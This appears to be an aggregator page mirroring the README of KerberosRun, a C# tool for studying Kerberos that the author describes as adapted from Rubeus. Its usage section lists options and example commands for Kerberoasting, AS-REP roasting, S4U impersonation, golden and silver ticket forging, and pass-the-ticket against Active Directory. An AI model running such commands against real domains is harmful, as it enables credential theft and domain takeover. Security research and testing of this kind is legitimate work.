GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → dev-2null → KerberosRun

dev-2null / KerberosRun

Licence: MIT License
A little tool to play with Kerberos.

Programming Languages

C#
18002 projects

Labels

kerberosadsecurity

Projects that are alternatives of or similar to KerberosRun

nsspi
A C# / .Net interface to the Win32 SSPI authentication API
Stars: ✭ 60 (+1.69%)
Mutual labels:  kerberos
go-spnego
Wraps gokrb5 and sspi libraries to provide cross-platform way to make HTTP calls with Kerberos authentication
Stars: ✭ 20 (-66.1%)
Mutual labels:  kerberos
OpenAM
OpenAM is an open access management solution that includes Authentication, SSO, Authorization, Federation, Entitlements and Web Services Security.
Stars: ✭ 476 (+706.78%)
Mutual labels:  kerberos
omniauth-kerberos
OmniAuth strategy for kerberos authentication.
Stars: ✭ 13 (-77.97%)
Mutual labels:  kerberos
python-krbcontext
A Kerberos context manager
Stars: ✭ 23 (-61.02%)
Mutual labels:  kerberos
pure-sasl
A pure python SASL client
Stars: ✭ 32 (-45.76%)
Mutual labels:  kerberos
Impacket
Impacket is a collection of Python classes for working with network protocols.
Stars: ✭ 8,037 (+13522.03%)
Mutual labels:  kerberos
windows-lab
Windows Automated Lab with Vagrant
Stars: ✭ 78 (+32.2%)
Mutual labels:  kerberos
vault-plugin-auth-kerberos
[DEPRECATED] Plugin for Hashicorp Vault enabling Kerberos authentication
Stars: ✭ 36 (-38.98%)
Mutual labels:  kerberos
WatchAD
AD Security Intrusion Detection System
Stars: ✭ 967 (+1538.98%)
Mutual labels:  kerberos
docker-kdc
Docker container generator for a Kerberos KDC.
Stars: ✭ 46 (-22.03%)
Mutual labels:  kerberos
kerby
Go wrapper for Kerberos GSSAPI
Stars: ✭ 33 (-44.07%)
Mutual labels:  kerberos
py-hdfs-mount
Mount HDFS with fuse, works with kerberos!
Stars: ✭ 13 (-77.97%)
Mutual labels:  kerberos
Cheat-Sheet---Active-Directory
This cheat sheet contains common enumeration and attack methods for Windows Active Directory with the use of powershell.
Stars: ✭ 154 (+161.02%)
Mutual labels:  kerberos
active-directory-integration2
WordPress plug-in "Next Active Directory Integration"
Stars: ✭ 51 (-13.56%)
Mutual labels:  kerberos
Evil Winrm
The ultimate WinRM shell for hacking/pentesting
Stars: ✭ 2,251 (+3715.25%)
Mutual labels:  kerberos
proxyplease
Cross-platform proxy selection with optional native authentication negotiation
Stars: ✭ 37 (-37.29%)
Mutual labels:  kerberos
code
~/code – tools distributed across all of my systems
Stars: ✭ 73 (+23.73%)
Mutual labels:  kerberos
KerberosConfigMgrIIS
Kerberos Configuration Manager for IIS
Stars: ✭ 40 (-32.2%)
Mutual labels:  kerberos
modules
Mesos modules examples and open source modules outside of the Apache Mesos source tree.
Stars: ✭ 26 (-55.93%)
Mutual labels:  kerberos
View All Similar Projects ➔

KerberosRun

KerberosRun is a little tool I use to study Kerberos internals together with my ADCollector. I'll try to learn and implement stuff from Rubeus, also something not in Rubeus.

KerberosRun uses the Kerberos.NET library built by Steve Syfuhs. It is heavily adapated from Harmj0y's Rubeus project (some code were taken directly from this project).

dev2null is the primary author of this project. My colleague Constantin is the collaborator who helped me build up the tool, had a lot of discussions with me and gave me ideas.

Thanks Steve for builting up this great library and having discussions with me to solve code problems. Thanks Harmj0y (and other authors) for the concepts and weaponization in Rubeus. Special thanks to @_dirkjan for helping me out regarding the KRBCRED structure and other questions.

Authentication Flows

AS Exchange

TGS Exchange: Unconstrained Delegation

TGS Exchange: S4U

TGS Exchange: Decrypted PAC

All In One

Usage

PS C:\Users\dev2null\Desktop> .\KerberosRun.exe    

   __           __
  / /_____ ____/ /  ___ _______  ___ ______ _____
 /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/

  v1.0.1

Usage: KerberosRun.exe -h
    
    [--AskTGT]              Ask for a TGT
        --User*             A valid username
        --Pass              A valid password
        --NopaC             Do not request PAC

    [--AskTGS]              Ask for a TGS
        --User*             A valid username
        --Pass              A valid password   
        --SPN*              Target SPN for the service request

    [--Kerberoast]          Kerberoasting
        --User*             A valid username
        --Pass              A valid password   
        --SPN*              Target SPN for Kerberoasting

    [--Asreproast]          ASREPRoasting
        --User*             A valid username that does not require PreAuth
        --Format            Output Hash format (John/Hashcat, Default: Hashcat)

    [--S4U2Self]            Service for User to Self
        --User*             A valid username that has SPN set
        --Pass              A valid password
        --ImperonsateUser*  A user to impersonate

    [--S4U]                 S4U2Self and S4U2Proxy
        --User*             A valid username that has SPN set
        --Pass              A valid password
        --Imperonsate*      A user to impersonate
        --SPN*              Target SPN for impersonate user

    [--Golden]              Build a Golden Ticket
        --RC4/AES128/AES256 krbtgt account hash
        --DomainSid*        Domain SIDs
        --UserID            User ID (default: 500)
        --User*             User name for the golden ticket

    [--Sliver]              Make a Sliver Ticket
        --RC4/AES128/AES256 Service account hash
        --DomainSid*        Domain SID
        --Service*          Service name (HTTP/CIFS/HOST...)
        --Host*             Target Servers
        --User*             User name for the sliver ticket

    [--Ticket]              Pass base64 encoded kirbi ticket into current session

     --Domain            A valid domain name (default: current domain)
     --RC4/AES128/AES256 A valid hash (alternative way for authentication) 
     --Verbose           Verbose mode
     --Outfile           Write the ticket to a kirbi file under the current directory
     --PTT               Pass the ticket into current session
     --DecryptTGT        Supply the krbtgt hash and decrypt the TGT ticket
     --DecryptTGS        Supply the service account hash and decrypt the TGS ticket
     --DecryptEtype   The encryption type of the hash for decrypting tickets (rc4/aes128/aes256) 
     --SrvName           The service account name for decrypting TGS


Example:  
        .\KerberosRun.exe --Asktgt --user username --pass password --nopac
        .\KerberosRun.exe --Asktgt --user username --pass password --verbose --outfile --decrypttgt [krbtgtHash] --decryptetype aes256
        .\KerberosRun.exe --Asktgs --user username --pass password --spn service/srv.domain.com --verbose --outfile
        .\KerberosRun.exe --Asreproast --user username --verbose
        .\KerberosRun.exe --Kerberoast --user username --rc4 [RC4Hash] --spn service/srv.domain.com
        .\KerberosRun.exe --S4U2Self --user username --aes128 [AES128Hash] --impersonateuser administrator --verbose
        .\KerberosRun.exe --S4U --user username --aes256 [AES256Hash] --impersonateuser administrator --spn ldap/dc1.domain.com --ptt
        .\KerberosRun.exe --Golden --user administrator --domain domain.com --userid 500 --domainsid  [DomainSID] --RC4 [krbtgtHash] --ptt
        .\KerberosRun.exe --Sliver --user administrator --domain domain.com --domainsid  [DomainSID] --RC4 [srvHash] --Service HTTP --HOST DC01$ -ptt
        .\KerberosRun.exe --Ticket Base64EncodedKirbiString/KirbiTicketFiles

Sample Commands & Results

| AskTGT | AskTGS | Asreproast | Kerberoast | S4U2Self | S4U | Golden | Sliver |

License

KerberosRun has an MIT License. See the License File for more details. Also see the Notices file for more information on the licenses of projects this depends on.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].